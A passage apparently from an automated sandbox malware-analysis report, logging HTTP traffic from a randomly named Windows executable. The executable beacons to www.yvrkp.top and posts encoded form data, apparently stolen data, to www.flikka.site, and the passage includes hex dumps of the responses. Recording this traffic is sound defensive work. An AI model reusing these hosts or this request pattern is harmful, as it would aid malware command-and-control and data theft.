                                                                                      Nov 13, 2024 09:27:47.350899935 CET486INData Raw: 6a ab b3 e6 ce 73 e3 ce 62 ed f1 81 55 9e 33 d6 a7 ac 37 2b c6 ec be 39 fb cc 6e 5c 9d ec 48 1b 13 11 dd 26 1b 43 d8 c6 10 64 00 64 39 04 45 a1 25 64 f5 07 a5 da 50 d1 fc eb b5 b1 fe c6 5a 1a ef 48 4b 13 85 b6 58 5a 83 cf e3 19 16 32 0c dd a2 cf
                                                                                      Data Ascii: jsbU37+9n\H&Cdd9E%dPZHKXZ23v~3@WAp* ~!j"V<fvh, S3Vgnl<yA2Ny lKpwdg(Su>,9V2Y(
                                                                                      Nov 13, 2024 09:27:47.540983915 CET1236INData Raw: 62 32 30 0d 0a ec 5d 5b 4f 1b 49 16 7e 9e 91 e6 3f d4 f4 cc c6 b6 12 5f f0 05 b0 03 96 32 1b 45 3b da 79 58 29 0f fb 10 45 a3 06 37 76 6f 1a b7 e5 6e 43 c8 45 22 84 8b 21 10 20 40 ec 70 09 21 21 0c b9 13 87 31 04 3b 20 ed 5f 19 57 5f 9e f8 0b ab
                                                                                      Data Ascii: b20][OI~?_2E;yX)E7vonCE"! @p!!1; _W_DKDqSNsw 0R.[0?*Y98cwR#I2@#^{k&^kF\zn99t:AJ<e(5HLR*%tiG8J
                                                                                      Nov 13, 2024 09:27:47.541006088 CET212INData Raw: 1e 5a 00 c1 b1 19 40 5f 0d 2a 64 9c 34 08 da 61 09 9a 00 c3 4c 18 60 16 8d 75 ad da da da 2c 39 a3 76 47 a1 e4 78 be 0e b1 8a e8 e3 ed 65 af 79 bb d8 ab 48 2d 05 f3 ca 88 af 37 37 ce 9f 11 18 ed 62 05 14 33 29 a5 9c a5 db c3 91 c5 c0 0f 54 04 fd
                                                                                      Data Ascii: Z@_*d4aL`u,9vGxeyH-77b3)T535`zrkR&Yl4={tS8_H9Dcnf9K)owf q5;s~Zy[}&hHl1VP(dD0!"?&d
                                                                                      Nov 13, 2024 09:27:47.541022062 CET1236INData Raw: 9d 67 b9 8b 0d 8a 8a f3 44 0c e4 b2 8c db c1 af 42 45 53 f2 22 1e 84 b2 e0 b1 97 93 a5 32 14 a9 00 37 6a 97 f6 64 5a 43 a3 50 7a cc 5c 4d d1 b4 f8 5c ac ce 49 e1 06 67 1a 9c 46 1f 39 0d 22 7c ce 08 64 ae 3a f8 8e 11 5d b9 01 2f c3 26 d9 a3 02 a3
                                                                                      Data Ascii: gDBES"27jdZCPz\M\IgF9"|d:]/&PkKRV"Ci@KRi.VeNG&A;TontCTA ,r:#/QrzgzLM$sq46P_:-A}5h_@
                                                                                      Nov 13, 2024 09:27:47.541038990 CET193INData Raw: 11 20 c8 c0 9f 14 c4 40 44 e4 8c 24 88 f3 d4 41 e4 89 86 a4 1c 97 fa bb 0e 90 64 d2 84 53 9b 9e 08 f8 82 1c ce a1 6d 4e 88 f6 40 5f 3f 7e 3f 4b 71 19 36 cd d1 7d d4 bf 11 05 17 03 97 ac 33 a7 82 73 95 61 69 94 17 d1 8a e0 d9 71 01 b8 f0 20 7a 12
                                                                                      Data Ascii: @D$AdSmN@_?~?Kq6}3saiq zC`ZTzakY\G'OWxIY}%"Zz$C]<GAUpYc-S9k0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      16192.168.2.459023104.21.14.183802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:27:48.656856060 CET523OUTGET /9jdk/?rP=WubzzLgyg7H8FuUk5n/moB8/gOqFZhsVZD6HlZkF1Lv4/cTJ30fLKlagebv44Go8+oe4d1owWbTtJNvV0eU1JmU5XMaUHO6aCszk2dDtn8pHKEGonxM30wY=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
                                                                                      Host: www.yvrkp.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Nov 13, 2024 09:27:50.170633078 CET1236INHTTP/1.1 200 OK
                                                                                      Date: Wed, 13 Nov 2024 08:27:49 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Cache-Control: private
                                                                                      X-AspNet-Version: 4.0.30319
                                                                                      X-Powered-By: ASP.NET
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Headers: Content-Type, needToken,method, Authorization
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UjHYZyHvwzHCSDoCM5s1iOqSX00sSzrK%2F2%2BqIe0qRkduGgQagp83h8%2FMkoiufNjgKYNUDa7rv114DpR5xWldq4%2Be6%2BrtephnSpL0ygZtixuRKDZ6vDDkXBvQki8t%2Fgbu"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e1d62807c14e936-DFW
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1305&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=523&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Raw: 31 33 30 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6a 73 20 63 73 73 61 6e 69 6d 61 74 69 6f 6e 73 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 20 20 3c
                                                                                      Data Ascii: 130d<!DOCTYPE html><html class="js cssanimations"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="description" content=""> <meta name="keywords" content=""> <
                                                                                      Nov 13, 2024 09:27:50.170670033 CET212INData Raw: 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 47 56 4a 54
                                                                                      Data Ascii: meta name="viewport" content="width=device-width, initial-scale=1"> <title>GVJTBEST</title> <meta name="renderer" content="webkit"> <meta http-equiv="Cache-Control" content="no-siteapp"> <meta nam
                                                                                      Nov 13, 2024 09:27:50.170703888 CET1236INData Raw: 65 3d 22 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 0d 0a 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61
                                                                                      Data Ascii: e="mobile-web-app-capable" content="yes"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="apple-mobile-web-app-status-bar-style" content="black"> <meta name="apple-mobile-web-app-title" content="Amaze UI"><met
                                                                                      Nov 13, 2024 09:27:50.170758009 CET1236INData Raw: 69 6e 64 65 78 3a 20 36 3b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 34 39 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 34 39 70
                                                                                      Data Ascii: index: 6; height: 49px; margin:0 auto; line-height: 49px; padding: 0 10px; width: 100%; text-align: center; background-color: #fff; } @media screen and (min-width: 75
                                                                                      Nov 13, 2024 09:27:50.170793056 CET1236INData Raw: 7b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 61 6d 2d 68 65 61 64 65 72 20 2e 61 6d 2d 68 65 61 64 65 72 2d 74 69 74 6c 65 20 69 6d 67 20 7b
                                                                                      Data Ascii: { background-color: #fff; } .am-header .am-header-title img { margin-top: 15px; height: 20px; width: 100px; vertical-align: top; } #about-us-detail { margin: 3px; }
                                                                                      Nov 13, 2024 09:27:50.170828104 CET694INData Raw: 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 61 6e 76 69 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 74 65 78 74 22 3e e9 a6 96 e9 a1 b5 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 3c
                                                                                      Data Ascii: <span class="canvi-navigation__text"></span> </a> </li> <li> <span class="canvi-navigation__item" id='about-us-title'> <span class="canvi-navigation__icon-wrapper"
                                                                                      Nov 13, 2024 09:27:50.170856953 CET694INData Raw: 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 61 6e 76 69 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 74 65 78 74 22 3e e9 a6 96 e9 a1 b5 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 3c
                                                                                      Data Ascii: <span class="canvi-navigation__text"></span> </a> </li> <li> <span class="canvi-navigation__item" id='about-us-title'> <span class="canvi-navigation__icon-wrapper"
                                                                                      Nov 13, 2024 09:27:50.170996904 CET1236INData Raw: 32 35 36 30 0d 0a e7 89 a9 e6 b5 81 e6 a2 9d e6 ac be 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 09 09 09 20 3c 6c 69 3e 20 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2f 74 68 2e 68 74 6d 6c 22 3e e9 80 80 e6 8f 9b e6 94 bf e7 ad 96 3c 2f 61 3e 3c 2f 6c
                                                                                      Data Ascii: 2560</a></li> <li> <a href="/about/th.html"></a></li> <li> <a href="/about/ys.html"></a></li> <li> <a href="/about/lxwm.html"></a></li> </ul>
                                                                                      Nov 13, 2024 09:27:50.171034098 CET212INData Raw: 8d e5 8b 99 e6 99 82 e9 96 93 ef bc 9a 28 55 54 43 2f 47 4d 54 2b 30 38 3a 30 30 29 3c 62 72 3e 39 3a 30 30 2d 31 38 3a 30 30 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f
                                                                                      Data Ascii: (UTC/GMT+08:00)<br>9:00-18:00</span> </span> </li> </ul> <div style="border-bottom: 1px dashed #dcdcdc;"></div></aside><div class="cus-header"> <span cl
                                                                                      Nov 13, 2024 09:27:50.171065092 CET1236INHTTP/1.1 200 OK
                                                                                      Date: Wed, 13 Nov 2024 08:27:49 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Cache-Control: private
                                                                                      X-AspNet-Version: 4.0.30319
                                                                                      X-Powered-By: ASP.NET
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Headers: Content-Type, needToken,method, Authorization
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UjHYZyHvwzHCSDoCM5s1iOqSX00sSzrK%2F2%2BqIe0qRkduGgQagp83h8%2FMkoiufNjgKYNUDa7rv114DpR5xWldq4%2Be6%2BrtephnSpL0ygZtixuRKDZ6vDDkXBvQki8t%2Fgbu"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e1d62807c14e936-DFW
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1305&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=523&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Raw: 31 33 30 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6a 73 20 63 73 73 61 6e 69 6d 61 74 69 6f 6e 73 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 20 20 3c
                                                                                      Data Ascii: 130d<!DOCTYPE html><html class="js cssanimations"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="description" content=""> <meta name="keywords" content=""> <
                                                                                      Nov 13, 2024 09:27:50.177561998 CET1236INData Raw: 61 73 73 3d 22 6a 73 2d 63 61 6e 76 69 2d 6f 70 65 6e 2d 62 75 74 74 6f 6e 2d 2d 6c 65 66 74 20 63 75 73 2d 68 65 61 64 65 72 2d 6c 65 66 74 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 7a 79 2d 74 77 2e 6f 73 73 2d 61 63 63 65
                                                                                      Data Ascii: ass="js-canvi-open-button--left cus-header-left"><img src="https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/menu.png" alt=""></span> <span class="cus-header-mid" style="color:black;font-weight:bold;">GVJTBEST </span>
                                                                                      Nov 13, 2024 09:27:50.177597046 CET1236INData Raw: 0a 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 37 35 25 3b 0d 0a 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20
                                                                                      Data Ascii: flex-direction: column; height: 75%; justify-content: center; align-items: center; /*overflow: hidden;*/ /*flex-shrink:0;*/}.sp_img img { width: auto; height: auto; max-width: 94%; max-he


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      17192.168.2.45905867.223.117.142802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:27:55.328007936 CET783OUTPOST /brrb/ HTTP/1.1
                                                                                      Host: www.flikka.site
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.flikka.site
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 199
                                                                                      Referer: http://www.flikka.site/brrb/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 43 77 30 5a 79 30 4c 56 42 4d 37 39 43 63 70 5a 64 6c 68 6d 36 35 45 6a 69 62 53 61 41 41 4a 45 35 35 46 74 51 71 48 31 64 31 79 59 67 5a 6e 48 53 4f 6c 55 78 67 58 47 67 4e 52 47 45 6a 6d 6d 50 70 65 61 6d 32 6b 46 59 75 70 6a 74 62 6a 45 67 79 42 6b 61 68 59 6f 46 6b 54 47 76 70 32 70 55 53 31 54 55 6b 70 32 57 69 6e 44 2f 51 57 45 58 36 35 45 7a 50 79 75 55 4c 79 70 6e 69 6d 5a 36 6d 54 66 4c 6a 4e 48 54 42 78 6a 5a 6f 49 34 61 2f 4a 66 32 48 6e 66 69 4b 50 59 34 43 37 5a 4c 76 6c 68 77 77 62 41 73 36 4f 37 4c 2b 77 54 36 4c 46 31 6b 39 46 38 76 71 75 78 71 48 6a 71 30 77 3d 3d
                                                                                      Data Ascii: rP=Cw0Zy0LVBM79CcpZdlhm65EjibSaAAJE55FtQqH1d1yYgZnHSOlUxgXGgNRGEjmmPpeam2kFYupjtbjEgyBkahYoFkTGvp2pUS1TUkp2WinD/QWEX65EzPyuULypnimZ6mTfLjNHTBxjZoI4a/Jf2HnfiKPY4C7ZLvlhwwbAs6O7L+wT6LF1k9F8vquxqHjq0w==
                                                                                      Nov 13, 2024 09:27:55.994162083 CET533INHTTP/1.1 404 Not Found
                                                                                      Date: Wed, 13 Nov 2024 08:27:55 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 389
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      18192.168.2.45906967.223.117.142802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:27:57.863544941 CET803OUTPOST /brrb/ HTTP/1.1
                                                                                      Host: www.flikka.site
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.flikka.site
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 219
                                                                                      Referer: http://www.flikka.site/brrb/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 43 77 30 5a 79 30 4c 56 42 4d 37 39 44 39 5a 5a 59 43 56 6d 71 70 45 6b 74 37 53 61 4b 67 4a 41 35 35 4a 74 51 76 2f 62 63 48 47 59 67 38 62 48 56 4e 39 55 77 67 58 47 72 74 52 44 4c 44 6d 68 50 70 44 77 6d 33 59 46 59 75 74 6a 74 65 48 45 67 44 42 6e 56 52 59 6d 51 30 54 2b 73 5a 32 70 55 53 31 54 55 6e 56 49 57 6d 44 44 34 68 6d 45 57 62 35 48 76 2f 79 68 54 4c 79 70 6a 69 6d 56 36 6d 54 35 4c 69 52 68 54 48 31 6a 5a 70 34 34 61 71 39 59 74 33 6e 56 38 36 4f 70 34 43 6a 64 46 4f 59 4d 32 78 62 4a 79 61 37 64 48 59 39 4a 72 36 6b 69 32 39 68 50 79 74 6e 46 6e 45 65 6a 76 35 44 4f 39 4d 63 41 30 55 31 59 65 62 4d 66 53 36 57 37 36 59 34 3d
                                                                                      Data Ascii: rP=Cw0Zy0LVBM79D9ZZYCVmqpEkt7SaKgJA55JtQv/bcHGYg8bHVN9UwgXGrtRDLDmhPpDwm3YFYutjteHEgDBnVRYmQ0T+sZ2pUS1TUnVIWmDD4hmEWb5Hv/yhTLypjimV6mT5LiRhTH1jZp44aq9Yt3nV86Op4CjdFOYM2xbJya7dHY9Jr6ki29hPytnFnEejv5DO9McA0U1YebMfS6W76Y4=
                                                                                      Nov 13, 2024 09:27:58.555423975 CET533INHTTP/1.1 404 Not Found
                                                                                      Date: Wed, 13 Nov 2024 08:27:58 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 389
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      19192.168.2.45908567.223.117.142802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:28:00.412889004 CET10885OUTPOST /brrb/ HTTP/1.1
                                                                                      Host: www.flikka.site
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.flikka.site
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 10299
                                                                                      Referer: http://www.flikka.site/brrb/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 43 77 30 5a 79 30 4c 56 42 4d 37 39 44 39 5a 5a 59 43 56 6d 71 70 45 6b 74 37 53 61 4b 67 4a 41 35 35 4a 74 51 76 2f 62 63 48 65 59 67 4f 44 48 54 73 39 55 69 77 58 47 6f 74 52 43 4c 44 6e 6b 50 70 4c 30 6d 33 55 56 59 6f 78 6a 73 39 2f 45 69 78 70 6e 4f 42 59 6d 53 30 54 46 76 70 32 38 55 53 6c 74 55 6e 46 49 57 6d 44 44 34 6a 2b 45 43 36 35 48 38 76 79 75 55 4c 79 62 6e 69 6e 41 36 6d 62 48 4c 69 45 61 53 32 4a 6a 5a 4a 6f 34 59 59 56 59 68 33 6e 54 39 36 4f 78 34 43 65 44 46 50 30 75 32 78 76 77 79 5a 6e 64 45 38 67 50 76 36 51 62 6a 39 78 68 77 2b 62 54 6f 54 4b 63 70 37 50 6b 7a 2b 45 65 70 56 49 31 53 38 78 71 42 36 6a 2b 6e 4e 73 61 62 47 74 37 30 65 33 56 75 4a 45 48 4f 55 66 76 2f 36 67 56 4b 4a 33 67 79 68 35 4d 34 6c 79 57 63 6b 68 33 38 2b 4b 2b 2b 53 79 6c 34 71 37 79 54 65 39 46 6a 78 73 58 41 54 79 78 73 73 50 6b 4c 6f 64 4e 36 79 74 66 45 35 7a 45 57 57 76 58 31 4e 4d 45 5a 58 2f 70 73 6e 4e 2f 33 56 51 6d 6e 2b 58 68 5a 41 64 77 61 71 67 42 66 57 7a 55 7a 32 69 59 4b 59 74 [TRUNCATED]
